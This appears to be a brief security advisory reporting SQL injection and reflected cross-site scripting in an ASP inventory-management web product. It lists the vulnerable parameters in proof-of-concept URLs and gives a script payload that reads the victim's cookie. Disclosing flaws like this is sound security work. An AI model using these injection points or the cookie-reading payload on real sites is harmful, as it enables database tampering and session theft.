vendor site:http://www.websitedesignsforless.com/
product:Inventory Manager
bug:injection sql & xss (get)
risk:medium
injection sql :
http://site.com/inventory/inventory/display/imager.asp?pictable='[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[invento
ry]&picfield=[sql]
http://site.com/inventory/inventory/display/imager.asp?pictable=[invento
ry]&picfield=photo&where='[sql]
xss get :
http://site.com/inventory/inventory/display/display_results.asp?category
=</textarea>'"><script>alert(document.cookie)</script>
laurent gaffi & benjamin moss
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]